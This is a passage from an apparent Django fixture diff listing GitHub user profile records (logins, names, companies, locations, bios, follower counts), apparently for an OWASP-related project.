"https://avatars.githubusercontent.com/u/27782897?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 23, + "created_at": "2017-04-19T18:56:38Z", + "updated_at": "2024-04-22T15:42:43Z", + "node_id": "MDQ6VXNlcjI3NzgyODk3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1043, + "fields": { + "nest_created_at": "2024-09-11T22:41:01.653Z", + "nest_updated_at": "2024-09-11T22:41:01.653Z", + "name": "Dương Tuấn Kiệt", + "login": "duongtuankiet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59653925?v=4", + "company": "NGN", + "location": "Vietnam", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2020-01-08T13:51:28Z", + "updated_at": "2024-08-26T10:21:57Z", + "node_id": "MDQ6VXNlcjU5NjUzOTI1", + "bio": "Hello everyone, I'm Kiet, a Cyber Security student.\r\n\r\nI'm working as an junior Network Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1044, + "fields": { + "nest_created_at": "2024-09-11T22:41:02.904Z", + "nest_updated_at": "2024-09-11T22:41:02.904Z", + "name": "", + "login": "vloup", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2750613?v=4", + "company": "", + "location": "::1", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2012-11-08T12:20:45Z", + "updated_at": "2024-05-28T18:44:51Z", + "node_id": "MDQ6VXNlcjI3NTA2MTM=", + "bio": "The SHA256 for this sentence begins with: c, seven, e, seven, c, two, eight and three.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1045, + "fields": { + "nest_created_at": "2024-09-11T22:41:04.182Z", + "nest_updated_at": "2024-09-22T19:48:24.392Z", + "name": "Stephen Sigwart", + "login": "ssigwart", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1426848?v=4", + "company": "RunSignup", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 11, + "public_gists_count": 8, + "public_repositories_count": 38, + "created_at": "2012-02-10T16:21:15Z", + "updated_at": "2024-09-18T03:36:54Z", + "node_id": "MDQ6VXNlcjE0MjY4NDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1046, + "fields": { + "nest_created_at": "2024-09-11T22:41:10.383Z", + "nest_updated_at": "2024-09-11T22:41:10.383Z", + "name": "", + "login": "Xakiadalisabad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/167477701?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-04-18T21:02:33Z", + "updated_at": "2024-04-18T21:02:33Z", + "node_id": "U_kgDOCfuBxQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1047, + "fields": { + "nest_created_at": "2024-09-11T22:41:11.256Z", + "nest_updated_at": "2024-09-11T22:41:11.256Z", + "name": "Victor Villarreal", + "login": "MefhigosetH", + "email": "mefhigoseth@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/527738?v=4", + "company": "Consejo Federal de la Energía Eléctrica", + "location": "Buenos Aires, Argentina", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 37, + "public_gists_count": 12, + "public_repositories_count": 36, + "created_at": "2010-12-17T20:22:15Z", + "updated_at": "2024-08-25T23:36:38Z", + "node_id": "MDQ6VXNlcjUyNzczOA==", + "bio": "Electronics, IoT, Offensive Security, Reverse Engineering, Networking, Algorithms and Data Structures, GNU / Linux based solutions and Cloud Native Apps", + "is_hireable": false, + "twitter_username": "mefhigoseth" + } +}, +{ + "model": "github.user", + "pk": 1048, + "fields": { + "nest_created_at": "2024-09-11T22:41:13.101Z", + "nest_updated_at": "2024-09-22T18:39:19.292Z", + "name": "Rohan Krishnaswamy", + "login": "rkrishn7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47869999?v=4", + "company": "Second Spectrum, Inc.", + "location": "Los Angeles, CA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 56, + "created_at": "2019-02-21T21:02:36Z", + "updated_at": "2024-09-07T00:41:12Z", + "node_id": "MDQ6VXNlcjQ3ODY5OTk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1049, + "fields": { + "nest_created_at": "2024-09-11T22:41:16.050Z", + "nest_updated_at": "2024-09-11T22:41:16.050Z", + "name": "", + "login": "cello86", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6987539?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-03-18T13:38:31Z", + "updated_at": "2024-09-03T20:03:24Z", + "node_id": "MDQ6VXNlcjY5ODc1Mzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1050, + "fields": { + "nest_created_at": "2024-09-11T22:41:18.931Z", + "nest_updated_at": "2024-09-11T22:41:18.931Z", + "name": "", + "login": "swagliquido", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/164777373?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2024-03-24T16:38:57Z", + "updated_at": "2024-09-05T12:03:12Z", + "node_id": "U_kgDOCdJNnQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1051, + "fields": { + "nest_created_at": "2024-09-11T22:41:20.259Z", + "nest_updated_at": "2024-09-11T22:41:20.259Z", + "name": "", + "login": "admiral504", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27339837?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-04-12T08:21:19Z", + "updated_at": "2024-02-13T08:03:16Z", + "node_id": "MDQ6VXNlcjI3MzM5ODM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1052, + "fields": { + "nest_created_at": "2024-09-11T22:41:21.516Z", + "nest_updated_at": "2024-09-11T22:41:21.516Z", + "name": "", + "login": "prince-java", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22311157?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-09-20T03:13:31Z", + "updated_at": "2021-02-04T09:10:54Z", + "node_id": "MDQ6VXNlcjIyMzExMTU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1053, + "fields": { + "nest_created_at": "2024-09-11T22:41:23.224Z", + "nest_updated_at": "2024-09-11T22:41:23.224Z", + "name": "Mark Collins", + "login": "Marcool04", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15948152?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 16, + "created_at": "2015-11-20T20:04:57Z", + "updated_at": "2024-07-13T07:09:49Z", + "node_id": "MDQ6VXNlcjE1OTQ4MTUy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1054, + "fields": { + "nest_created_at": "2024-09-11T22:41:24.453Z", + "nest_updated_at": "2024-09-11T22:41:24.453Z", + "name": "Nicolas Rodriguez", + "login": "n-rodriguez", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3433835?v=4", + "company": "Nicolas Rodriguez Consulting", + "location": "France", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 49, + "public_gists_count": 3, + "public_repositories_count": 12, + "created_at": "2013-01-31T02:32:57Z", + "updated_at": "2024-09-10T20:18:25Z", + "node_id": "MDQ6VXNlcjM0MzM4MzU=", + "bio": "Ex founder of @jbox-web, now freelancer as SysAdmin, Ruby/Rails developer and eventually DevOps :) From bare metal to web browser and beyond!", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1055, + "fields": { + "nest_created_at": "2024-09-11T22:41:28.233Z", + "nest_updated_at": "2024-09-11T22:41:28.233Z", + "name": "", + "login": "MariuszMilka", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/149587435?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-01T12:09:09Z", + "updated_at": "2024-07-06T10:58:06Z", + "node_id": "U_kgDOCOqF6w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1056, + "fields": { + "nest_created_at": "2024-09-11T22:41:29.457Z", + "nest_updated_at": "2024-09-11T22:41:29.457Z", + "name": "", + "login": "Rapsody09", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48986124?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-03-27T10:25:26Z", + "updated_at": "2024-07-08T08:41:25Z", + "node_id": "MDQ6VXNlcjQ4OTg2MTI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1057, + "fields": { + "nest_created_at": "2024-09-11T22:41:32.388Z", + "nest_updated_at": "2024-09-11T22:41:32.388Z", + "name": "", + "login": "AngelSamuel", + "email": "angelsamuelsc@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1496319?v=4", + "company": "ProfesionalHosting", + "location": "Madrid", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2012-03-03T12:17:18Z", + "updated_at": "2024-02-26T11:46:44Z", + "node_id": "MDQ6VXNlcjE0OTYzMTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1058, + "fields": { + "nest_created_at": "2024-09-11T22:41:34.982Z", + "nest_updated_at": "2024-09-11T22:41:34.982Z", + "name": "", + "login": "langenggithub", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/125963074?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-02-21T09:03:55Z", + "updated_at": "2024-07-30T01:06:53Z", + "node_id": "U_kgDOB4ILQg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1059, + "fields": { + "nest_created_at": "2024-09-11T22:41:37.548Z", + "nest_updated_at": "2024-09-22T18:39:04.549Z", + "name": "", + "login": "eduar-hte", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/130087371?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-04-06T17:23:31Z", + "updated_at": "2024-09-10T15:47:09Z", + "node_id": "U_kgDOB8D5yw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1060, + "fields": { + "nest_created_at": "2024-09-11T22:41:38.769Z", + "nest_updated_at": "2024-09-11T22:41:38.769Z", + "name": "", + "login": "Eco6", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/160248349?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 53, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2024-02-16T14:04:14Z", + "updated_at": "2024-08-27T09:41:56Z", + "node_id": "U_kgDOCY0yHQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1061, + "fields": { + "nest_created_at": "2024-09-11T22:41:40.081Z", + "nest_updated_at": "2024-09-11T22:41:40.081Z", + "name": "", + "login": "Lathanderjk", + "email": "lathanderjk@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9073634?v=4", + "company": "", + "location": "Slovakia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-10-08T08:50:50Z", + "updated_at": "2022-12-08T12:58:13Z", + "node_id": "MDQ6VXNlcjkwNzM2MzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1062, + "fields": { + "nest_created_at": "2024-09-11T22:41:41.304Z", + "nest_updated_at": "2024-09-11T22:41:41.304Z", + "name": "", + "login": "yancong303", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41030599?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-07-10T01:48:44Z", + "updated_at": "2024-08-02T03:07:07Z", + "node_id": "MDQ6VXNlcjQxMDMwNTk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1063, + "fields": { + "nest_created_at": "2024-09-11T22:41:42.573Z", + "nest_updated_at": "2024-09-14T19:32:52.886Z", + "name": "", + "login": "capy3ra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/80744099?v=4", + "company": "PTIT", + "location": "Viet Nam", + "collaborators_count": 0, + "following_count": 40, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2021-03-16T07:16:41Z", + "updated_at": "2024-08-30T11:19:54Z", + "node_id": "MDQ6VXNlcjgwNzQ0MDk5", + "bio": "NaN", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1064, + "fields": { + "nest_created_at": "2024-09-11T22:41:43.828Z", + "nest_updated_at": "2024-09-22T18:39:00.995Z", + "name": "", + "login": "einsibjarni", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35595673?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-01-19T09:24:02Z", + "updated_at": "2024-09-07T10:48:00Z", + "node_id": "MDQ6VXNlcjM1NTk1Njcz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1065, + "fields": { + "nest_created_at": "2024-09-11T22:41:45.557Z", + "nest_updated_at": "2024-09-11T22:41:45.557Z", + "name": "", + "login": "allahshukur-ahmadzada", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81165623?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-03-22T12:20:13Z", + "updated_at": "2024-07-05T07:19:17Z", + "node_id": "MDQ6VXNlcjgxMTY1NjIz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1066, + "fields": { + "nest_created_at": "2024-09-11T22:42:17.792Z", + "nest_updated_at": "2024-09-22T18:39:38.901Z", + "name": "LuizBoina", + "login": "LuizBoina", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32649613?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2017-10-09T17:59:51Z", + "updated_at": "2024-07-15T16:25:26Z", + "node_id": "MDQ6VXNlcjMyNjQ5NjEz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1067, + "fields": { + "nest_created_at": "2024-09-11T22:42:21.163Z", + "nest_updated_at": "2024-09-22T18:39:43.239Z", + "name": "Marcel Haag", + "login": "marcel-haag", + "email": "marcel.haag@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/73169169?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2020-10-20T10:11:12Z", + "updated_at": "2024-05-24T19:07:01Z", + "node_id": "MDQ6VXNlcjczMTY5MTY5", + "bio": "IT Nomad, Crafting solutions by day, Breaking applications by night. \r\n\r\nFounder and lead developer of security-c4po.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1068, + "fields": { + "nest_created_at": "2024-09-11T22:42:33.484Z", + "nest_updated_at": "2024-09-22T18:39:43.871Z", + "name": "Norman Schmidt", + "login": "norman-schmidt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60552466?v=4", + "company": "@NovatecConsulting", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-02-01T18:34:58Z", + "updated_at": "2024-06-24T09:09:22Z", + "node_id": "MDQ6VXNlcjYwNTUyNDY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1069, + "fields": { + "nest_created_at": "2024-09-11T22:42:38.436Z", + "nest_updated_at": "2024-09-22T18:39:43.558Z", + "name": "Stipe Knez", + "login": "Stipe-Knez", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/79542386?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-02-23T20:11:51Z", + "updated_at": "2023-06-27T10:44:59Z", + "node_id": "MDQ6VXNlcjc5NTQyMzg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1070, + "fields": { + "nest_created_at": "2024-09-11T22:42:57.043Z", + "nest_updated_at": "2024-09-11T22:42:57.043Z", + "name": "", + "login": "Challakh-MA", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/152565073?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-30T23:07:31Z", + "updated_at": "2023-12-01T13:59:20Z", + "node_id": "U_kgDOCRf1UQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1071, + "fields": { + "nest_created_at": "2024-09-11T22:44:11.340Z", + "nest_updated_at": "2024-09-22T18:41:49.220Z", + "name": "TESTABLE", + "login": "testable-eu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/115642030?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2022-10-12T13:47:02Z", + "updated_at": "2023-06-20T15:23:58Z", + "node_id": "O_kgDOBuSOrg", + "bio": "", + "is_hireable": false, + "twitter_username": "Testable_EU" + } +}, +{ + "model": "github.user", + "pk": 1072, + "fields": { + "nest_created_at": "2024-09-11T22:44:14.588Z", + "nest_updated_at": "2024-09-22T18:41:52.853Z", + "name": "compaluca", + "login": "compaluca", + "email": "luca.compagna@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12697501?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2015-06-01T14:03:28Z", + "updated_at": "2024-09-16T07:36:36Z", + "node_id": "MDQ6VXNlcjEyNjk3NTAx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1073, + "fields": { + "nest_created_at": "2024-09-11T22:44:16.173Z", + "nest_updated_at": "2024-09-22T18:41:53.516Z", + "name": "Judith", + "login": "felix-20", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39854388?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-06-02T10:24:01Z", + "updated_at": "2024-09-20T11:56:54Z", + "node_id": "MDQ6VXNlcjM5ODU0Mzg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1074, + "fields": { + "nest_created_at": "2024-09-11T22:44:17.365Z", + "nest_updated_at": "2024-09-22T18:41:54.791Z", + "name": "Malte", + "login": "mal-tee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45886910?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 39, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2018-12-14T23:08:28Z", + "updated_at": "2024-09-07T11:06:08Z", + "node_id": "MDQ6VXNlcjQ1ODg2OTEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1075, + "fields": { + "nest_created_at": "2024-09-11T22:44:19.011Z", + "nest_updated_at": "2024-09-11T22:44:25.257Z", + "name": "", + "login": "vlkl-sap", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71723302?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2020-09-22T17:07:25Z", + "updated_at": "2024-03-12T17:50:22Z", + "node_id": "MDQ6VXNlcjcxNzIzMzAy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1076, + "fields": { + "nest_created_at": "2024-09-11T22:44:28.237Z", + "nest_updated_at": "2024-09-22T18:41:47.152Z", + "name": "Manu", + "login": "ManuManu97", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48594310?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2019-03-15T13:51:59Z", + "updated_at": "2024-09-05T23:42:31Z", + "node_id": "MDQ6VXNlcjQ4NTk0MzEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1077, + "fields": { + "nest_created_at": "2024-09-11T22:44:29.545Z", + "nest_updated_at": "2024-09-22T18:41:54.160Z", + "name": "Lukas Seidel", + "login": "pr0me", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5177161?v=4", + "company": "Binarly", + "location": "Germany", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 50, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2013-08-06T20:40:33Z", + "updated_at": "2024-08-16T06:58:27Z", + "node_id": "MDQ6VXNlcjUxNzcxNjE=", + "bio": "Information Security Researcher and PhD Candidate", + "is_hireable": true, + "twitter_username": "pr0me" + } +}, +{ + "model": "github.user", + "pk": 1078, + "fields": { + "nest_created_at": "2024-09-11T22:44:47.385Z", + "nest_updated_at": "2024-09-22T20:21:29.401Z", + "name": "Soheil", + "login": "SoheilKhodayari", + "email": "soheil.khodayari@cispa.saarland", + "avatar_url": "https://avatars.githubusercontent.com/u/6915465?v=4", + "company": "CISPA ", + "location": "Saarland, Germany", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 57, + "public_gists_count": 2, + "public_repositories_count": 48, + "created_at": "2014-03-11T06:09:10Z", + "updated_at": "2024-09-13T12:09:41Z", + "node_id": "MDQ6VXNlcjY5MTU0NjU=", + "bio": "Security & privacy researcher, hacking, patching, and drinking coffee... and then do it all over again!", + "is_hireable": true, + "twitter_username": "Soheil__K" + } +}, +{ + "model": "github.user", + "pk": 1079, + "fields": { + "nest_created_at": "2024-09-11T22:44:52.845Z", + "nest_updated_at": "2024-09-22T18:41:54.473Z", + "name": "Simone Jovon", + "login": "Simojoviz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57804307?v=4", + "company": "", + "location": "Venice", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2019-11-15T15:04:17Z", + "updated_at": "2024-06-19T07:06:46Z", + "node_id": "MDQ6VXNlcjU3ODA0MzA3", + "bio": "", + "is_hireable": false, + "twitter_username": "simone_jovon" + } +}, +{ + "model": "github.user", + "pk": 1080, + "fields": { + "nest_created_at": "2024-09-11T22:44:56.572Z", + "nest_updated_at": "2024-09-22T15:40:44.412Z", + "name": "Martino Lessio", + "login": "mlessio", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3406495?v=4", + "company": "@mindedsecurity ", + "location": "Italy", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 16, + "public_gists_count": 3, + "public_repositories_count": 26, + "created_at": "2013-01-28T14:09:27Z", + "updated_at": "2024-08-30T14:42:33Z", + "node_id": "MDQ6VXNlcjM0MDY0OTU=", + "bio": "Fullstack developer and Security consultant. Cooking lover and biker.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1081, + "fields": { + "nest_created_at": "2024-09-11T22:45:02.828Z", + "nest_updated_at": "2024-09-22T18:39:44.850Z", + "name": "MantiumAI", + "login": "mantiumai", + "email": "operations@mantiumai.com", + "avatar_url": "https://avatars.githubusercontent.com/u/82233875?v=4", + "company": "", + "location": "United States of America", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2021-04-09T17:59:14Z", + "updated_at": "2024-06-05T21:35:16Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjgyMjMzODc1", + "bio": "", + "is_hireable": false, + "twitter_username": "MantiumAI" + } +}, +{ + "model": "github.user", + "pk": 1082, + "fields": { + "nest_created_at": "2024-09-11T22:45:06.282Z", + "nest_updated_at": "2024-09-22T18:39:48.906Z", + "name": "Alex Nork", + "login": "alex-nork", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48630278?v=4", + "company": "", + "location": "Columbus, OH", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-03-16T18:36:20Z", + "updated_at": "2024-07-25T20:58:35Z", + "node_id": "MDQ6VXNlcjQ4NjMwMjc4", + "bio": "software engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1083, + "fields": { + "nest_created_at": "2024-09-11T22:45:08.389Z", + "nest_updated_at": "2024-09-22T18:39:49.878Z", + "name": "Ryan", + "login": "rseveymant", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123193740?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2023-01-20T16:52:15Z", + "updated_at": "2024-08-06T23:27:01Z", + "node_id": "U_kgDOB1fJjA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1084, + "fields": { + "nest_created_at": "2024-09-11T22:45:10.496Z", + "nest_updated_at": "2024-09-22T18:39:49.211Z", + "name": "Rob Zimmerman", + "login": "zimventures", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23481310?v=4", + "company": "@ZimventuresLLC ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 10, + "created_at": "2016-11-15T15:45:21Z", + "updated_at": "2024-08-11T16:52:47Z", + "node_id": "MDQ6VXNlcjIzNDgxMzEw", + "bio": "Just another keyboard wielding primate. ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1085, + "fields": { + "nest_created_at": "2024-09-11T22:45:17.889Z", + "nest_updated_at": "2024-09-22T18:39:51.137Z", + "name": "", + "login": "JustEmrick", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/86671951?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-06-29T14:29:36Z", + "updated_at": "2023-08-18T00:24:47Z", + "node_id": "MDQ6VXNlcjg2NjcxOTUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1086, + "fields": { + "nest_created_at": "2024-09-11T22:45:30.717Z", + "nest_updated_at": "2024-09-22T18:39:52.468Z", + "name": "OWASP Dep Scan Project", + "login": "owasp-dep-scan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/143658023?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 32, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2023-08-30T20:55:05Z", + "updated_at": "2024-01-17T17:04:57Z", + "node_id": "O_kgDOCJAMJw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1087, + "fields": { + "nest_created_at": "2024-09-11T22:45:34.233Z", + "nest_updated_at": "2024-09-22T18:53:31.367Z", + "name": "prabhu", + "login": "prabhu", + "email": "prabhu@appthreat.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7842?v=4", + "company": "AppThreat", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 109, + "public_gists_count": 27, + "public_repositories_count": 87, + "created_at": 